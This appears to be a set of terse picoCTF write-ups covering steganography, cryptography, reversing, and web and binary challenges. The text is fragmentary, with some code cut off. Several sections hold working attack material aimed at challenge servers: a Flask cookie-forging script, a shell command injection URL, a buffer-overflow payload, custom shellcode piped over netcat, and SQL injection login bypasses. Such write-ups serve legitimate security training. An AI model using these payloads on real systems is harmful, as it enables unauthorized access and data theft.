- How do operating systems know what kind of file it is? (It's not just the ending!
- Make sure to submit the flag as picoCTF{XXXXX}
- Download the txt file
- Because there's no 'picoCTF' in it, change the file type to png and you'll see this
- There is data encoded somewhere... there might be an online decoder.
- Download the image and upload it to Online Steganography Tool
- Hit the 'Decode' button and get the flag in the Hidden message subtitle
- Running this in a debugger would be helpful
wget https://mercury.picoctf.net/static/dbb130222bcd47ce98d355561e8746c4/chall.S
and runvi chall.S
to change the file like this
movl -276(%rbp), %eax
movslq %eax, %rbx
leaq -144(%rbp), %rax
movq %rax, %rdi
movl $49, %eax
//call strlen@PLT
cmpq %rax, %rbx
jb .L3
leaq -272(%rbp), %rcx
leaq -208(%rbp), %rax
movl $49, %edx
movq %rcx, %rsi
movq %rax, %rdi
call memcmp@PLT
testl %eax, %eax
je .L4
leaq .LC1(%rip), %rdi
call puts@PLT
movl $0, %eax
jmp .L6
- Exit it and run
gcc -g chall.S
,chmod +x ./a.out
,gdb ./a.out
- After that, run
x/96i main
to find the address which containsmemcmp@plt
and quit - Run
and runc
type in whatever you want - Last run
printf "%s\n", $rsi
to get your flag
- https://code.yidas.com/linux-vi-vim-command/
- https://github.com/Dvd848/CTFs/blob/master/2021_picoCTF/Lets_get_dynamic.md
- https://www.youtube.com/watch?v=sb8burpLyok&ab_channel=MartinCarlisle
- How secure is a flask cookie?
wget https://mercury.picoctf.net/static/cae5577e6b8f86e17d7884723204f61e/server.py
andvim server.py
to look at the source code -
Press the link, press the 'EditThisCookie' button and copy the cookie value You can download EditThisCookie in here
Go back to the webshell and run
vim solve.py
import flask
import hashlib
from sys import argv
from flask.json.tag import TaggedJSONSerializer
from itsdangerous import URLSafeTimedSerializer, TimestampSigner, BadSignature
cookie = argv[1]
cookie_names = ["snickerdoodle", "chocolate chip", "oatmeal raisin", "gingersnap",
"shortbread", "peanut butter", "whoopie pie", "sugar", "molasses", "kiss",
"biscotti", "butter", "spritz", "snowball", "drop", "thumbprint", "pinwheel",
"wafer", "macaroon", "fortune", "crinkle", "icebox", "gingerbread", "tassie",
"lebkuchen", "macaron", "black and white", "white chocolate macadamia"]
real_secret = ''
for secret in cookie_names:
serializer = URLSafeTimedSerializer(
'key_derivation' : 'hmac',
'digest_method' : hashlib.sha1
except BadSignature:
print(f'Secret key: {secret}')
real_secret = secret
session = {'very_auth' : 'admin'}
'key_derivation' : 'hmac',
'digest_method' : hashlib.sha1
- After running
and you'll get
Secret key: gingersnap
- Enter the Secret key you got to the website and press 'EditThisCookie' button to change the cookie value to THE_STRING_UNDER_SECRET_KEY
- Reload the page and you'll get the flag
wget https://artifacts.picoctf.net/picoMini+by+redpwn/Web+Exploitation/caas/index.js
and runstrings index.js
to read the sourse code- Press the link and you'll see this
- Change the URL to
and get this
< hi >
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
- Try
< hi >
\ ^__^
\ (oo)\_______
(__)\ )\/\
||----w |
|| ||
Which means linux commands works here
5. Go to https://caas.mars.picoctf.net/cowsay/hi;cat%20falg.txt
and grab your flag
wget https://artifacts.picoctf.net/picoMini+by+redpwn/Cryptography/xtraordinary/output.txt
andcat output.txt
to take the string:57657535570c1e1c612b3468106a18492140662d2f5967442a2960684d28017931617b1f3637
wget https://artifacts.picoctf.net/picoMini+by+redpwn/Cryptography/xtraordinary/encrypt.py
andvim encrypt.py
to realize how the xor encryption doesvim solve.py
and write down
#!/usr/bin/env python3
from random import randint
from Crypto.Util.number import bytes_to_long, long_to_bytes
ctxt = long_to_bytes(0x57657535570c1e1c612b3468106a18492140662d2f5967442a2960684d28017931617b1f3637);
key = b'Africa!';
def encrypt(ptxt, key):
ctxt = b''
for i in range(len(ptxt)):
a = ptxt[i]
b = key[i % len(key)]
ctxt += bytes([a ^ b])
return ctxt
random_strs = [
b'my encryption method',
b'is absolutely impenetrable',
b'and you will never',
b'break it'
ctxt = encrypt(ctxt, random_strs[2]);
ctxt = encrypt(ctxt, random_strs[3]);
ctxt = encrypt(ctxt, random_strs[4]);
flag = encrypt(ctxt, key);
- Run
python solve.py
to get the flag
- https://ankmak.com/tech/2021/10/07/picoctf-write-up-cryptography.html#xtraordinary-150-points
- https://b1ue.x0.com/writeup/2021picomini/#XtraORdinary
wget https://artifacts.picoctf.net/picoMini+by+redpwn/Cryptography/triple-secure/public-key.txt
andwget https://artifacts.picoctf.net/picoMini+by+redpwn/Cryptography/triple-secure/encrypt.py
cat public-key.txt
and get
n1: 15192492059814175574941055248891268822162533520576381643453916855435310880285336743521199057138647926712835561752909538944229702432795423884081992987060760867003375755338557996965825324749221386675061886921763747311599846248565297387814717840084998677273427776535730840343260681623323972936404815862969684384733188827100528542007213405382537935243645704237369770300643318878176739181891072725262069278646319502747718264711249767568106460533935904219027313131270918072460753061248221785076571054217566164086518459844527639082962818865640864990672033657423448004651989761933295878220596871163544315057550871764431562609
n2: 15896482259608901559307142941940447232781986632502572991096358742354276347180855512281737388865155342941898447990281534875563129451327818848218781669275420292448483501384399236235069545630630803245125324540747189305877026874280373084005881976783826855683894679886076284892158862128016644725623200756074647449586448311069649515124968073653962156220351541159266665209363921681260367806445996085898841723209546021525012849575330252109081102034217511126192041193752164593519033112893785698509908066978411804133407757110693612926897693360335062446358344787945536573595254027237186626524339635916646549827668224103778645691
n3: 16866741024290909515057727275216398505732182398866918550484373905882517578053919415558082579015872872951000794941027637288054371559194213756955947899010737036612882434425333227722062177363502202508368233645194979635011153509966453453939567651558628538264913958577698775210185802686516291658717434986786180150155217870273053289491069438118831268852205061142773994943387097417127660301519478434586738321776681183207796708047183864564628638795241493797850819727510884955449295504241048877759144706319821139891894102191791380663609673212846473456961724455481378829090944739778647230176360232323776623751623188480059886131
e: 65537
c: 5527557130549486626868355638343164556636640645975070563878791684872084568660950949839392805902757480207470630636669246237037694811318758082850684387745430679902248681495009593699928689084754915870981630249821819243308794164014262751330197659053593094226287631278905866187610594268602850237495796773397013150811502709453828013939726304717253858072813654392558403246468440154864433527550991691477685788311857169847773031859714215539719699781912119479668386111728900692806809163838659848295346731226661208367992168348253106720454566346143578242135426677554444162371330348888185625323879290902076363791018691228620744490
strings encrypt.py
and get
#!/usr/bin/env python3
from Crypto.Util.number import getPrime, bytes_to_long
with open('flag.txt', 'rb') as f:
flag = f.read()
p = getPrime(1024)
q = getPrime(1024)
r = getPrime(1024)
n1 = p * q
n2 = p * r
n3 = q * r
moduli = [n1, n2, n3]
e = 65537
c = bytes_to_long(flag)
for n in moduli:
c = pow(c, e, n)
with open('public-key.txt', 'w') as f:
f.write(f'n1: {n1}\n')
f.write(f'n2: {n2}\n')
f.write(f'n3: {n3}\n')
f.write(f'e: {e}\n')
f.write(f'c: {c}\n')
Run pip install libnum
if you don't have it
4. vim solve.py
and write
import libnum
import gmpy2
n1 = 15192492059814175574941055248891268822162533520576381643453916855435310880285336743521199057138647926712835561752909538944229702432795423884081992987060760867003375755338557996965825324749221386675061886921763747311599846248565297387814717840084998677273427776535730840343260681623323972936404815862969684384733188827100528542007213405382537935243645704237369770300643318878176739181891072725262069278646319502747718264711249767568106460533935904219027313131270918072460753061248221785076571054217566164086518459844527639082962818865640864990672033657423448004651989761933295878220596871163544315057550871764431562609
n2 = 15896482259608901559307142941940447232781986632502572991096358742354276347180855512281737388865155342941898447990281534875563129451327818848218781669275420292448483501384399236235069545630630803245125324540747189305877026874280373084005881976783826855683894679886076284892158862128016644725623200756074647449586448311069649515124968073653962156220351541159266665209363921681260367806445996085898841723209546021525012849575330252109081102034217511126192041193752164593519033112893785698509908066978411804133407757110693612926897693360335062446358344787945536573595254027237186626524339635916646549827668224103778645691
n3 = 16866741024290909515057727275216398505732182398866918550484373905882517578053919415558082579015872872951000794941027637288054371559194213756955947899010737036612882434425333227722062177363502202508368233645194979635011153509966453453939567651558628538264913958577698775210185802686516291658717434986786180150155217870273053289491069438118831268852205061142773994943387097417127660301519478434586738321776681183207796708047183864564628638795241493797850819727510884955449295504241048877759144706319821139891894102191791380663609673212846473456961724455481378829090944739778647230176360232323776623751623188480059886131
e = 65537
c = 5527557130549486626868355638343164556636640645975070563878791684872084568660950949839392805902757480207470630636669246237037694811318758082850684387745430679902248681495009593699928689084754915870981630249821819243308794164014262751330197659053593094226287631278905866187610594268602850237495796773397013150811502709453828013939726304717253858072813654392558403246468440154864433527550991691477685788311857169847773031859714215539719699781912119479668386111728900692806809163838659848295346731226661208367992168348253106720454566346143578242135426677554444162371330348888185625323879290902076363791018691228620744490
mix = int(gmpy2.iroot(n1 * n2 * n3, 2)[0])
r = mix // n1
q = mix // n2
p = mix // n3
phi1 = (p - 1) * (q - 1)
phi2 = (p - 1) * (r - 1)
phi3 = (q - 1) * (r - 1)
d1 = libnum.modular.invmod(e, phi1)
d2 = libnum.modular.invmod(e, phi2)
d3 = libnum.modular.invmod(e, phi3)
c = pow(c, d3, n3)
c = pow(c, d2, n2)
c = pow(c, d1, n1)
m = c
flag = libnum.n2s(m)
python solve.py
and get your string
wget https://artifacts.picoctf.net/picoMini+by+redpwn/Binary+Exploitation/clutter-overflow/chall.c
andstrings chall.c
to know how it workswget https://artifacts.picoctf.net/picoMini+by+redpwn/Binary+Exploitation/clutter-overflow/chall
chmod +x ./chall
,gdb ./chall
,disassemble main
and get
0x000000000040073d <+118>: lea -0x110(%rbp),%rax
0x0000000000400744 <+125>: mov %rax,%rdi
0x0000000000400747 <+128>: mov $0x0,%eax
0x000000000040074c <+133>: call 0x4005d0 <gets@plt>
0x0000000000400751 <+138>: mov $0xdeadbeef,%eax
0x0000000000400756 <+143>: cmp %rax,-0x8(%rbp)
0x000000000040075a <+147>: jne 0x40078c <main+197>
0x000000000040075c <+149>: mov $0xdeadbeef,%esi
- Try
and input lots of 'a's but it returns
code != 0xdeadbeef :(
[Inferior 1 (process 293) exited normally]
and try(python3 -c 'import sys; sys.stdout.write("A" * 264)'; echo -e '\xef\xbe\xad\xde') | ./chall
and it returns
code == 0xdeadbeef: how did that happen??
take a flag for your troubles
cat: flag.txt: No such file or directory
- Try
(python3 -c 'import sys; sys.stdout.write("A" * 264)'; echo -e '\xef\xbe\xad\xde') | nc mars.picoctf.net 31890
and it returns the flag this time
wget https://artifacts.picoctf.net/picoMini+by+redpwn/Reverse+Engineering/not-crypto/not-crypto
- https://sourceware.org/gdb/onlinedocs/gdb/Basic-Python.html#Basic-Python
- With GDB Python, I can guess wrong flags faster than ever before!
- Press the link then right-click on the webpage to select 'Inspect'
- Press 'Sourses' and select the file under 'wasm' then copy the two string in quotation marks at the end of the file
- Go back to the webshell and run
vim solve.py
d_1024 = b"PASTE_THE_STRING_BESIDE_`data (i32.const 1024)`_ADD_'x'_BEHIND_'\'"
d_1067 = b"PASTE_THE_STRING_BESIDE_`data (i32.const 1067)`_ADD_'x'_BEHIND_'\'"
out = bytearray()
for i, c in enumerate(d_1024):
char = d_1067[4 - (i%5)]
out.append(c ^ char)
- Run
python solve.py
to get your flag
- Take a look at the calling convention and see how you might be able to setup all the registers
wget https://mercury.picoctf.net/static/bbf1df1382e5c08be25164bda6357775/fun
chmod +x ./fun
and it asked for a code but it returnsSegmentation fault (core dumped)
after enter a string- Run
gdb ./fun
,disass main
to find this
0x0804869c <+201>: lea -0x3f5(%ebp),%eax
0x080486a2 <+207>: push %eax
0x080486a3 <+208>: call 0x80484f6 <execute>
0x080486a8 <+213>: add $0x10,%esp
0x080486ab <+216>: mov $0x0,%eax
- Use
b *0x80484f6
to set a break point and rundisass execute
to find this
0x080485c3 <+205>: mov %eax,-0x20(%ebp)
0x080485c6 <+208>: mov -0x20(%ebp),%eax
0x080485c9 <+211>: call *%eax
0x080485cb <+213>: mov %ebx,%esp
- Use
b *0x080485c9
to set the second break point, pressr
- Continue checking things in memory by running
x/25b $eax
andx/25b $esp
- Quit GDB mode and run
pwn asm -f hex "mov eax, 17"
it returnsb811000000
pwn disasm "b81190900000909000"
and get
0: b8 11 90 90 00 mov eax, 0x909011
5: 00 .byte 0x0
6: 90 nop
7: 90 nop
pwn disasm "31C9F7E1B00551687373776468632F7061682F2F657489E3CD809391B00331D266BAFF0F42CD809231C0B004B301CD8093CD80"
and get
0: 31 c9 xor ecx, ecx
2: f7 e1 mul ecx
4: b0 05 mov al, 0x5
6: 51 push ecx
7: 68 73 73 77 64 push 0x64777373
c: 68 63 2f 70 61 push 0x61702f63
11: 68 2f 2f 65 74 push 0x74652f2f
16: 89 e3 mov ebx, esp
18: cd 80 int 0x80
1a: 93 xchg ebx, eax
1b: 91 xchg ecx, eax
1c: b0 03 mov al, 0x3
1e: 31 d2 xor edx, edx
20: 66 ba ff 0f mov dx, 0xfff
24: 42 inc edx
25: cd 80 int 0x80
27: 92 xchg edx, eax
28: 31 c0 xor eax, eax
2a: b0 04 mov al, 0x4
2c: b3 01 mov bl, 0x1
2e: cd 80 int 0x80
30: 93 xchg ebx, eax
31: cd 80 int 0x80
pwn asm -f hex "push 0x7478742e; push 0x67616c66;" | xxd -p -r | pwn disasm
and it outputs
0: 68 2e 74 78 74 push 0x7478742e
5: 68 66 6c 61 67 push 0x67616c66
pwn disasm "31C031DBB011B303F7E3F7E3B302F7E3D1EB01D8B302F7E3F7E3D1EB01D8B302F7E3D1EB01D8B311F7E3B302F7E3F7E3D1EB01D8509031C0B07FB317F7E3B302F7E3D1EB01D8B302F7E35B90F7E35090"
andpwn disasm "509031C031D2B240B040F7E250905A9031C0B00129C25890"
to rewrite the fileprintf "\x31\xC9\xF7\xE1\x51\x90\x31\xC0\x31\xDB\xB0\x11\xB3\x03\xF7\xE3\xF7\xE3\xB3\x02\xF7\xE3\xD1\xEB\x01\xD8\xB3\x02\xF7\xE3\xF7\xE3\xD1\xEB\x01\xD8\xB3\x02\xF7\xE3\xD1\xEB\x01\xD8\xB3\x11\xF7\xE3\xB3\x02\xF7\xE3\xF7\xE3\xD1\xEB\x01\xD8\x50\x90\x31\xC0\xB0\x7F\xB3\x17\xF7\xE3\xB3\x02\xF7\xE3\xD1\xEB\x01\xD8\xB3\x02\xF7\xE3\x5B\x90\xF7\xE3\x50\x90\x31\xC0\x31\xDB\xB0\x2F\xF7\xE0\xB3\x02\xF7\xE3\xF7\xE3\xD1\xEB\x01\xD8\x50\x90\x31\xC0\xB0\x2B\xB3\x03\xF7\xE3\xB3\x02\xF7\xE3\xF7\xE3\xF7\xE3\xD1\xEB\x01\xD8\xB3\x13\xF7\xE3\xB3\x05\xF7\xE3\xB3\x02\xF7\xE3\x5B\x90\xF7\xE3\x50\x90\x31\xC0\xB0\x05\x89\xE3\xCD\x80\x93\x90\x91\x90\xB0\x03\x31\xD2\x50\x90\x31\xC0\x31\xD2\xB2\x40\xB0\x40\xF7\xE2\x50\x90\x5A\x90\x31\xC0\xB0\x01\x29\xC2\x58\x90\x42\x90\xCD\x80\x92\x90\x31\xC0\xB0\x04\xB3\x01\xCD\x80\x93\x90\xCD\x80\n" | nc mercury.picoctf.net 16460
and get your key
- I tried to make it a little bit less contrived since the mini competition.
- Each filter is separated by a space. Spaces are not filtered.
- There is only 1 round this time, when you beat it the flag will be in filter.php.
- There is a length component now.
- sqlite
- Press the link
- Type
in the Username and input1' is not '0
for the password and press enter - Enter
to see the flag
- Switching things up
- After downloading the file and read it
- You'll find out that the flag is
and turn from decimal to hexcimal
- We tend to move only forward, but it may be a good idea to begin solving it backwards.
- The flag is in standard format, I promise.
wget https://mercury.picoctf.net/static/b7d195fdb3c93fd2b3d363bb355555cb/output.txt
andwget https://mercury.picoctf.net/static/b7d195fdb3c93fd2b3d363bb355555cb/rev_PS.ps1
vim solve.py
and runpython solve.py
for i in range(len(output_dat)):
ans = output_dat[i] ^ result ^ random[i]
result = ans ^ result ^ random[i]
# print(fun)
blocks = [""] * 5
for i in range(len(fun)):
tmp = fun[i]
raw = []
block = []
for j in range(0, len(tmp), 2):
if tmp[j:j+2] == "11":
look = [False] * len(raw)
for j in range(len(raw)):
y = (j * seed[i]) % len(raw)
while look[y] == True:
y = (y+1) % len(raw)
look[y] = True
for j in range(30):
blocks[j // 6] += block[j]
for j in range(5):
blocks[j] += " "
for i in range(0, len(blocks[0]), 7):
if blocks[0][i:i+7] == "100001 ":
print(0, end = "")
print(1, end = "")
Don't forget to Press esc to exit
3. Copy the result you just get and paste after running cat > input.txt
4. vim s.py
and run python s.py
to get your flag
from Crypto.Util.number import long_to_bytes
- https://hackmd.io/@bigdrea6/BJcLLkoW5
- https://ret2home.github.io/blog/CTF/picoctf-2021/rev/powershelly/
- https://www.youtube.com/watch?v=MxywIqXvPrQ&ab_channel=MissingSemester
- https://github.com/IRS-Cybersec/ctfdump/tree/master/picoCTF/2021/RE/Powershelly
- There are tools that make this easy.
- Perhaps looking at history will help
nc jupiter.challenges.picoctf.org 58295
- Copy the woeds and use vigenere-solver to decrypt
- Find the flag in the result
- You don't need to download a new web browser
- Press the link
- Press 'Flag' button but get this...
- Press 'F12' to enter the DevTool window
- Press the three dots beside the gear button >>> 'More tools' >>> 'Network conditions' and change the user agent to 'picobroswer'
- Press the 'Flag' button to get the flag
- assembly conditions
wget https://jupiter.challenges.picoctf.org/static/f1c2358ff7d1e9386e41552c549cf2f6/test.S
string test.S
and get
<+0>: push ebp
<+1>: mov ebp,esp
<+3>: cmp DWORD PTR [ebp+0x8],0x3fb
<+10>: jg 0x512 <asm1+37>
<+12>: cmp DWORD PTR [ebp+0x8],0x280
<+19>: jne 0x50a <asm1+29>
<+21>: mov eax,DWORD PTR [ebp+0x8]
<+24>: add eax,0xa
<+27>: jmp 0x529 <asm1+60>
<+29>: mov eax,DWORD PTR [ebp+0x8]
<+32>: sub eax,0xa
<+35>: jmp 0x529 <asm1+60>
<+37>: cmp DWORD PTR [ebp+0x8],0x559
<+44>: jne 0x523 <asm1+54>
<+46>: mov eax,DWORD PTR [ebp+0x8]
<+49>: sub eax,0xa
<+52>: jmp 0x529 <asm1+60>
<+54>: mov eax,DWORD PTR [ebp+0x8]
<+57>: add eax,0xa
<+60>: pop ebp
<+61>: ret
- Because
2e0 < 3fb
, go to <+12> and know that2e0 != 280
- Therefore, go to <+19> and ensure that we should jump to <+29>
- After moving value to eax,<+32> told us to do
2e0 - a
and get2d6
- Then jump to <+60> which moves the value we get above to ebp and return to us
- So
is the flag
- What kind of encoding uses dashes and dots?
- The flag is in the format PICOCTF{}
nc jupiter.challenges.picoctf.org 9422
and get.--. .. -.-. --- -.-. - ..-. { -- ----- .-. ... ...-- -.-. ----- -.. ...-- .---- ... ..-. ..- -. ..--- -.... ---.. ...-- ---.. ..--- ....- -.... .---- ----- }
- Copy it and paste it to Online Morse Decoder to get the flag
- The flag is in the format PICOCTF{}
- Download the picture and open it
- Use International_maritime_signal_flags and International_Code_of_Signals to identify the flag
- https://github.com/Dvd848/CTFs/blob/master/2019_picoCTF/Flags.md
- https://en.wikipedia.org/wiki/International_maritime_signal_flags
- https://en.wikipedia.org/wiki/International_Code_of_Signals
- I hear python can convert things.
- It might help to have multiple windows open.
nc jupiter.challenges.picoctf.org 15130
and got
Let us see how data is stored
Please give the 01101100 01100001 01101101 01110000 as a word.
Just enter the second line as input or use Binary-to-Ascii Converter 2. Then it gave us ...
Please give me the 154 151 147 150 164 as a word.
Use Octal to text Converter 3. Then it gave us ...
Please give me the 636f6d7075746572 as a word.
Use Hex-to-Ascii Converter 4. Here comes the flag
- https://zomry1.github.io/based/
- https://www.rapidtables.com/convert/number/binary-to-ascii.html
- http://www.unit-conversion.info/texttools/octal/
- https://www.rapidtables.com/convert/number/hex-to-ascii.html
wget https://jupiter.challenges.picoctf.org/static/d5570d48262dbba2a31f2a940409ad9d/message.txt
cat message.txt
and getpicoCTF{(35.028309, 135.753082)(46.469391, 30.740883)(39.758949, -84.191605)(41.015137, 28.979530)(24.466667, 54.366669)(3.140853, 101.693207)_(9.005401, 38.763611)(-3.989038, -79.203560)(52.377956, 4.897070)(41.085651, -73.858467)(57.790001, -152.407227)(31.205753, 29.924526)}
- Find them through Google and get all the first alphabet from the result
[K]yoto (35.028309, 135.753082)
[O]dessa (46.469391, 30.740883)
[D]ayton (39.758949, -84.191605)
[I]stanbul (41.015137, 28.979530)
[A]bu Dhabi (24.466667, 54.366669)
[K]uala Lumpur (3.140853, 101.693207)
[A]ddis Ababa (9.005401, 38.763611)
[L]oja (-3.989038, -79.203560)
[A]msterdam (52.377956, 4.897070)
[S]leepy Hollow (41.085651, -73.858467)
[K]odiak (57.790001, -152.407227)
[A]lexandria (31.205753, 29.924526)
- Remember the flag format is picoCTF{XXXX}
- What's a pipe? No not that kind of pipe... This kind
nc jupiter.challenges.picoctf.org 14291 |grep pico
and you'll get the flag
- Make a table that contains each value of the loop variables and the corresponding buffer index that it writes to.
wget https://jupiter.challenges.picoctf.org/static/943ea40e3f54fca6d2145fa7aadc5e09/VaultDoor3.java
and runstrings VaultDoor3.java
import java.util.*;
class VaultDoor3 {
public static void main(String args[]) {
VaultDoor3 vaultDoor = new VaultDoor3();
Scanner scanner = new Scanner(System.in);
System.out.print("Enter vault password: ");
String userInput = scanner.next();
String input = userInput.substring("picoCTF{".length(),userInput.length()-1);
if (vaultDoor.checkPassword(input)) {
System.out.println("Access granted.");
} else {
System.out.println("Access denied!");
// Our security monitoring team has noticed some intrusions on some of the
// less secure doors. Dr. Evil has asked me specifically to build a stronger
// vault door to protect his Doomsday plans. I just *know* this door will
// keep all of those nosy agents out of our business. Mwa ha!
// -Minion #2671
public boolean checkPassword(String password) {
if (password.length() != 32) {
return false;
char[] buffer = new char[32];
int i;
for (i=0; i<8; i++) {
buffer[i] = password.charAt(i);
for (; i<16; i++) {
buffer[i] = password.charAt(23-i);
for (; i<32; i+=2) {
buffer[i] = password.charAt(46-i);
for (i=31; i>=17; i-=2) {
buffer[i] = password.charAt(i);
String s = new String(buffer);
return s.equals("jU5t_a_sna_3lpm18g947_u_4_m9r54f");
- Run
and do it like this
> password = "jU5t_a_sna_3lpm18g947_u_4_m9r54f"
> var i;
> var buffer = Array(32);
> for (i=0; i<8; i++) {
... buffer[i] = password.charAt(i);
... }
> for (; i<16; i++) {
... buffer[i] = password.charAt(23-i);
... }
> for (; i<32; i+=2) {
... buffer[i] = password.charAt(46-i);
... }
> for (i=31; i>=17; i-=2) {
... buffer[i] = password.charAt(i);
... }
> console.log("picoCTF{" + buffer.join("") + "}");
- Run
nc jupiter.challenges.picoctf.org 18821
- Open a python code editor (e.g. VScode)
- Get the number it gave and replace the variables
import binascii
import rsa
import gmpy2
from pwn import *
# First Question
q = 60413
p = 76753
n = p*q
print("n =", n)
### 4636878989
# Second Question
p = 54269
n = 5051846941
q = n / p
print("q =", q)
### 93089
# Third Question
### n
# Fourth Question
p = 12611
q = 66347
r = (p - 1) * (q - 1)
print("r =", r)
### 836623060
# Fifth Question
n = 29129463609326322559521123136222078780585451208149138547799121083622333250646678767769126248182207478527881025116332742616201890576280859777513414460842754045651093593251726785499360828237897586278068419875517543013545369871704159718105354690802726645710699029936754265654381929650494383622583174075805797766685192325859982797796060391271817578087472948205626257717479858369754502615173773514087437504532994142632207906501079835037052797306690891600559321673928943158514646572885986881016569647357891598545880304236145548059520898133142087545369179876065657214225826997676844000054327141666320553082128424707948750331
e = 3
msg = 6357294171489311547190987615544575133581967886499484091352661406414044440475205342882841236357665973431462491355089413710392273380203038793241564304774271529108729717
c = pow(msg, e, n)
print("c =", c)
### 256931246631782714357241556582441991993437399854161372646318659020994329843524306570818293602492485385337029697819837182169818816821461486018802894936801257629375428544752970630870631166355711254848465862207765051226282541748174535990314552471546936536330397892907207943448897073772015986097770443616540466471245438117157152783246654401668267323136450122287983612851171545784168132230208726238881861407976917850248110805724300421712827401063963117423718797887144760360749619552577176382615108244813
# Sixth Question
### n
# Seventh Question
p = 97846775312392801037224396977012615848433199640105786119757047098757998273009741128821931277074555731813289423891389911801250326299324018557072727051765547115514791337578758859803890173153277252326496062476389498019821358465433398338364421624871010292162533041884897182597065662521825095949253625730631876637
q = 92092076805892533739724722602668675840671093008520241548191914215399824020372076186460768206814914423802230398410980218741906960527104568970225804374404612617736579286959865287226538692911376507934256844456333236362669879347073756238894784951597211105734179388300051579994253565459304743059533646753003894559
e = 65537
r = (p-1)*(q-1)
d = int(gmpy2.invert(e, r))
print("d =", d)
### 1405046269503207469140791548403639533127416416214210694972085079171787580463776820425965898174272870486015739516125786182821637006600742140682552321645503743280670839819078749092730110549881891271317396450158021688253989767145578723458252769465545504142139663476747479225923933192421405464414574786272963741656223941750084051228611576708609346787101088759062724389874160693008783334605903142528824559223515203978707969795087506678894006628296743079886244349469131831225757926844843554897638786146036869572653204735650843186722732736888918789379054050122205253165705085538743651258400390580971043144644984654914856729
# Eighth Question
p = gmpy2.mpz(153143042272527868798412612417204434156935146874282990942386694020462861918068684561281763577034706600608387699148071015194725533394126069826857182428660427818277378724977554365910231524827258160904493774748749088477328204812171935987088715261127321911849092207070653272176072509933245978935455542420691737433)
n = gmpy2.mpz(23952937352643527451379227516428377705004894508566304313177880191662177061878993798938496818120987817049538365206671401938265663712351239785237507341311858383628932183083145614696585411921662992078376103990806989257289472590902167457302888198293135333083734504191910953238278860923153746261500759411620299864395158783509535039259714359526738924736952759753503357614939203434092075676169179112452620687731670534906069845965633455748606649062394293289967059348143206600765820021392608270528856238306849191113241355842396325210132358046616312901337987464473799040762271876389031455051640937681745409057246190498795697239)
e = 65537
c = 13433290949680532374013867441263154634705815037382789341947905025573905974395028146503162155477260989520870175638250366834087929309236841056522311567941474209163559687755762232926539910909326834168973560610986090744435081572047926364479629414399701920441091626046861493465214197526650146669009590360242375313096062285541413327190041808752295242278877995930751460977420696964385608409717277431821765402461515639686537904799084682553530460611519251872463837425068958992042166507373556839377045616866221238932332390930404993242351071392965945718308504231468783743378794612151028803489143522912976113314577732444166162766
q = n // p
d = int(gmpy2.invert(e, (p-1)*(q-1)))
m = pow(c, d, n)
print("m =", m)
### 14311663942709674867122208214901970650496788151239520971623411712977120527163003942343369341
# Ninth Question
t = 14311663942709674867122208214901970650496788151239520971623411712977120527163003942343369341
ht = hex(t)
s = binascii.a2b_hex(ht[2:])
### b'picoCTF{wA8_th4t$_ill3aGal..oa2d2239b}'
- What is obfuscation?
- Press the link to get here
- Press 'Ctrl + U' and copy the javascript codes between
- Paste them to Javascript Beautifier
- And look at the var at the third line of the result
var _0x5a46 = ["0a029}", "_again_5", "this", "Password Verified", "Incorrect password", "getElementById", "value", "substring", "picoCTF{", "not_this"];
- Get the flag
- http://www.jsnice.org/
- https://github.com/Dvd848/CTFs/blob/master/2019_picoCTF/Client-side-again.md
- https://ctftime.org/writeup/19130
- It may help to analyze this image in multiple ways: as a blob, and as an actual mounted disk.
- Have you heard of slack space? There is a certain set of tools that now come with Ubuntu that I'd recommend for examining that disk space phenomenon...
wget https://jupiter.challenges.picoctf.org/static/52f3ab2c16c051e744ea5b029c24011b/suspicious.dd.sda1
file suspicious.dd.sda1
and getsuspicious.dd.sda1: Linux rev 1.0 ext3 filesystem data, UUID=fc168af0-183b-4e53-bdf3-9c1055413b40 (needs journal recovery)
- Check the file's content by
fls suspicious.dd.sda1
d/d 11: lost+found
d/d 2009: boot
d/d 4017: tce
r/r 12: suspicious-file.txt
V/V 8033: $OrphanFiles
- Get the txt file by
icat suspicious.dd.sda1 12
and getNothing to see here! But you may want to look here -->
strings -a -t x suspicious.dd.sda1 | grep "Nothing to see here! But you may want to look here"
to get it's address200400 Nothing to see here! But you may want to look here -->
xxd -s 0x200400 -l 200 suspicious.dd.sda1
to see the stuffs beside it
00200400: 4e6f 7468 696e 6720 746f 2073 6565 2068 Nothing to see h
00200410: 6572 6521 2042 7574 2079 6f75 206d 6179 ere! But you may
00200420: 2077 616e 7420 746f 206c 6f6f 6b20 6865 want to look he
00200430: 7265 202d 2d3e 0a7d 0031 0032 0039 0030 re -->.}.
00200440: 0038 0038 0061 0062 005f 0033 003c 005f .8.8.a.b._.3.<._
00200450: 007c 004c 006d 005f 0031 0031 0031 0074 .|.L.m._.1.1.1.t
00200460: 0035 005f 0033 0062 007b 0046 0054 0043 .5._.3.b.{.F.T.C
00200470: 006f 0063 0069 0070 0000 0000 0000 0000 .o.c.i.p........
00200480: 0000 0000 0000 0000 0000 0000 0000 0000 ................
00200490: 0000 0000 0000 0000 0000 0000 0000 0000 ................
002004a0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
002004b0: 0000 0000 0000 0000 0000 0000 0000 0000 ................
002004c0: 0000 0000 0000 0000 ........
- Run
od --skip-bytes=0x200437 --read-bytes=66 suspicious.dd.sda1 --format=c --address-radix=n --width=100 | sed "s/\\\0//g" | tr -d " " | rev
to get your flag
- You are not allowed to login with valid credentials.
- Write down the injections you use in case you lose your progress.
- For some filters it may be hard to see the characters, always (always) look at the raw hex in the response.
- sqlite
- If your cookie keeps getting reset, try using a private browser window
Round 1:
filter.php : or
Username: admin' --
Password: asdfgh
Round 2:
filter.php: or and like = --
Username: admin'/*
Password: asdfgh
Round 3:
filter.php: or and = like > < --
Username: admin'/*
Password: asdfgh
Round 4:
filter.php: or and = like > < -- admin
Username: adm'||'in'/*
Password: asdfgh
Round 5:
filter.php: or and = like > < -- union admin
Username: adm'||'in'/*
Password: asdfgh
- Reload the filter.php and got the flag
- https://github.com/onealmond/hacking-lab/blob/master/picoctf-2020/web-gauntlet/writeup.md
- https://zacheller.dev/pico-web-gauntlet
- https://medium.com/@shaunak007/picogym-web-gauntlet-983b17732b3d
- Having a good foundation may be helpful later
- Make sure your shellcode works for the situation.
Nah (Still thinking how to solve it without installing Linux)
Nah (Still thinking how to solve it without installing Linux)
- Download the pcapng file and open it by Wireshark
- Find the data and put it in out.txt (This must be in the same directory with the file we create next)
- Create a python file in Vscode and run it after writing this
#!/usr/bin/env python3
import random
from time import time
